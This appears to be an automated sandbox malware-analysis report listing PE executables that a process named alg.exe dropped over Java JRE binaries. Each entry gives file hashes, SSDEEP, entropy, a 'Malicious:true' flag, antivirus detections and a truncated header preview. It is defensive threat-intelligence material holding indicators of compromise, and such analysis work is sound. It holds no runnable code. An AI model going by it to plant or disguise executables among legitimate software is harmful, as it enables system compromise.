                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@......9........................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1212416
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.119732345803419
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:Qv1vvRXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:41xsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:AD94D138C6AB6F95B6EBF268E386755F
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:FA779AC5C26B57690A97C6E6813E5A220D7F6371
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:39F92FD38B232B33C40D17357AC8AB794D385E8044A65F76FA4FB26E6173B51D
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:D47CFF501658B66DB32AACCFAA411C727AE67562701C7B7F1883294F31A635262001493A67D8F008EE0009E45758C1850AB7D28A550AF4B18B5EE430C1CD8DB6
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@.................................._......................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.44682498980596
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:tnU/h/4K7sqjnhMgeiCl7G0nehbGZpbD:tU/VvDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:DD275F3B848ACF8A0CA85F158DF3011B
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:5AC5AC1F6850DA67C42F7E649AA2B50800487FA5
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:4E1C88B04277255A158CB82013349F4681780758DC7EEE426F778CE916864E4A
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:71349D01C5F6241CB1938EEF8CC53909629B07A0F6C954BC0A3E4EECD12066BD6EEE876A7CFFD6C000808D0ED27DFD51A0A94C7FE882741E4D44453882E8D188
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@.......U.......................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1513984
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.4837442663752745
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:Tx71iBLZ05jNTmJWEx4sqjnhMgeiCl7G0nehbGZpbD:TxhiHIjNgkDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:42A898F0C35200E482BC1A60D3AC4405
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:70FDE8AA37E2A5507F7C18C6CB342D6A6C6181B0
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:9898168955778C16AFC7306BFA6466DC65A40AB2346C61590AEAF60D27FA9BBB
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:098E95409C65486DCA8177803ACB85592E42A63A7A0DEEDA637280B3048C3EE7EB885909277051A462C31A5EAD86B9891E834B566703C1A70B64118134F373CE
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@.............................................................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.0328879152491135
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:o3rtXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:ExsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:7B9BD97E03DB480B843586404814C000
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:1B052B2DAAAB94D0ED827864512E2E7FE628F4E6
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:2AB793385D83BC324B3759737DA64DE473545F29D193DCCAAF48CB8AE9553CAB
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:EBB483D5AC44707CF9BD4D5130339331A17AC02FED17F097F69C0014D6803F04545E816DAAC3BDCAF0B8E6ECF60C859FE6CA56490E649A57CEEB6350702EF144
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................. .......................................&.......@..H............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1242112
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.1726713414322685
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:EYdP/eXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:pdP/esqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:28EB761E0AB3DF10E546D1DD7239CDF2
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:EDB43C86353EFC4839A1808538268485E1B318BD
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:9B7340680874E398D573F520A8425D27CACDD0ACB890350B03E2EC76AA4941AF
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:44640682FFB3B447E633F08034E2A7B06308954C54EE2149A16E52103E3348F8A13F5797BE421C65A97AD1F96BC5FE89F4D5D222A0DF70AFB953538D34FBC619
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@..........................P..................................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.032908671836241
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:Hy5FXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:SbsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:1E8C98E24E2A58C927C8F055F6C098BD
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:3454E7240BD034AA91E6D9067B7585036E3DDF25
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:2C6EF7D8EF41A2D053BD7646BBD5ABF76A9B77C10396CF429C2FB1E7F0EB1DCE
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:CECDD10FCD89762CA98665F759F9CB8BCB20F985298334927C2EE0DC87E2DD544433B9100988533F88F61197BFD027CF23FF986319C33EB8872D5A2787D3F584
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................'=.......................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.032985588724308
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:LKldXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:ufsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:28EE94BB61AEEDC8A1E86DE807587481
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:8C2025E9413260C55B4CF1CE735860642CF53C9A
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:58BBFD97C54CB6084DB15ABDFE83F81EE56EE4D50D5DCBEC75BFEDDEA3B6551D
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:1A88003F8439F9E3192430474F3538145E400AE4D0E31871D3E1CE267D157D889B4D6261AA74CE8E844646DFB6A09CED6F82134549F06EB1489BFF29B8D88EF8
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.032984313504245
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:VildXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:YfsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:3C92323ACA4E652C15C999BD8AF60038
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:FD28E7EC94A03CDBE458E1AA82D97769B9C9E0E0
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:7B9603C96F41D313889ADC2D36D95177D6305889CE22BCA3914A36E9E1F5F519
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:9FE1CF26D13348937DF4701FB7BDD71137A25873046D5BF9D3F779ACB67C57180AEB3249249436E58CAA46C54A185FA6A75D6F4FE4F37D89CCC99D9C4EC49046
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................4........................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.032959748624351
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:STm9Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:kwsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:711A6399B3848B215333B17C936DF060
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:1CE113D62E189888E1A13B4B481A864D39BC0817
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:3F129669D19B9255D587ED4BE960C1E47E3B769CBE84603A1DA4F6721C4610D0
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:35D5A874A31FD8CE2715A03AD10EC2B70D403CC8A1428491806EB9F8F9C4008456D9D24AB0E59012917832FA2FA5E3C8D3BF20FF63E47F7B2F96CC30EF27FD90
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.033873299644662
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:SamRXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:V8sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:4D23B2B5B76A6456D5175798D98DEF43
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:D1FD0E69D4E68A6181651A53F8429EEE664D868E
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:B62E593EE7D4041C2026271F651252BE6674AE1BC99600AA935AA9564CC1EA2C
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:B5339FE35E4C2328BA0A0AB17A3D5FA8558DF6E0831A002B696DDD62334E2A090D82594E4F1FFD5AFFAC6AFFF878BC8CA0DA85C36D631760C20DD049E8764D7B
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.........................................................................D'.......@..P........................... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.032930493342418
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:cQ5FXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:LjsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:998130E43B1A09F6A6855810CC19D5F4
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:00EEE729E17E8B8877754086FA61C5CC246EB1F2
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:4267C4AA21192597C700FD45A0AEA19FE1401CEC41277FE24A8B5655AA0AE746
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:2B03B353F9925F5B33288D929941041F5B66F0B24D34282EFB949848DB3D2266F843E0A7E9D981CB23827550DF2813A4FD80DC98BADB723A3BDC3560DD190620
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.032975087686589
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:UV/dXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:Q1sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:453D0F4BD1BA7814219E9F7E8CA648A1
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:80A22CCABD0DD5611DA3AB84C26B0E266206E140
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:2E7BB814C73C1B3C47A9F1F1D5F3344AA75D63F6F2F41B7600A643A4332659CD
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:8ADA33B5AE1443EA893AEA0DB851D2D9074F5FC39444490CB6C15913CA1367A1946A102AB9B7FB02C253817740A8A6FC44C3850A2A6E1DB363D19703FE915CBE
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................c........................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.032877142016508
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:AZmNXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:swsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:6F209DE0057F8CE39CE4FEA7F2B66B4A
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:34C9077F876C29A2B73A1BEF7FF40FCC1DD5F7DF
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:64CF82883ED5307DD4389C4005ACB57865715CDB191DEBCC8627665405E89EEC
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:9CEAB68EC1A261AE1A3D6CB40F5248DAED8AD132907159E49887632F01D9D817E491E3A727313F7CC4072EFB5B2C61EE94406F36316BBE59096BD62AD7904625
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................,.......................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.032912718000925
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
